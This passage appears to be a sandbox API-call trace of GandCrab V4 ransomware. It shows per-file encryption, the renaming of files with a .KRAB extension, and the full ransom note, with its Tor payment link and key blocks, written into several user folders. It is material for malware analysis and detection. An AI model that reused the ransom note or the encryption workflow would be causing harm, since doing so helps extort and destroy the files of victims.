dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.973] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011238) returned 1 [0085.974] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023338) returned 1 [0085.974] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0085.975] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0085.975] GetLastError () returned 0x0 [0085.975] CryptDestroyKey (hKey=0x1023338) returned 1 [0085.975] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0085.975] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0085.976] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10231f8) returned 1 [0085.977] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0085.977] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0085.977] GetLastError () returned 0x0 [0085.977] CryptDestroyKey (hKey=0x10231f8) returned 1 [0085.977] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0085.977] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0085.978] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.978] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.978] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x51f, lpOverlapped=0x0) returned 1 [0086.007] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffae1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.007] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x51f, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x51f, lpOverlapped=0x0) returned 1 [0086.007] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0086.007] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.011] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.011] CloseHandle (hObject=0x434) returned 1 [0086.012] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.012] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\sikvnb huvuib.contact"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\sikvnb huvuib.contact.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\sikvnb huvuib.contact.krab")) returned 1 [0086.013] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.013] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0086.013] FindClose (in: hFindFile=0x1023cb8 | out: hFindFile=0x1023cb8) returned 1 [0086.013] CloseHandle (hObject=0x320) returned 1 [0086.013] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0086.013] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0086.013] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0086.013] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Cookies" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Cookies") returned="C:\\Users\\CIiHmnxMn6Ps\\Cookies" [0086.013] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Cookies", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\" [0086.013] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0086.014] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0086.014] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0086.014] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0086.014] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0086.014] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.014] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.015] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\\\KRAB-DECRYPT.txt") returned 47 [0086.015] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\cookies\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0086.016] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0086.016] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0086.016] CloseHandle (hObject=0x320) returned 1 [0086.017] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.017] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.017] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x21, wMilliseconds=0xdd)) [0086.017] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.017] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0086.018] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0086.018] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\d2ca4a08d2ca4dee3d.lock") returned 53 [0086.018] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\cookies\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0086.019] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.019] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.019] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\") returned 30 [0086.019] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\*" [0086.020] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xffffffff [0086.020] CloseHandle (hObject=0x320) returned 1 [0086.020] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0086.020] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0086.020] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0086.020] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\d2ca4a08d2ca4dee3d.lock" [0086.020] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.020] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 50 [0086.020] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\d2ca4a08d2ca4dee3d.lock") returned 45 [0086.020] lstrlenW (lpString=".lock") returned 5 [0086.020] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.021] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0086.021] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.021] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.021] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0086.021] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0086.022] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0086.022] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Desktop" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop" [0086.022] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" [0086.022] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0086.022] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0086.022] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0086.022] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0086.022] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0086.022] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.022] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.023] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\\\KRAB-DECRYPT.txt") returned 47 [0086.023] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0086.024] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0086.024] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0086.024] CloseHandle (hObject=0x320) returned 1 [0086.024] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.025] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.025] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x21, wMilliseconds=0xdd)) [0086.025] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.026] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0086.026] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0086.026] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\d2ca4a08d2ca4dee3d.lock") returned 53 [0086.026] CreateFileW 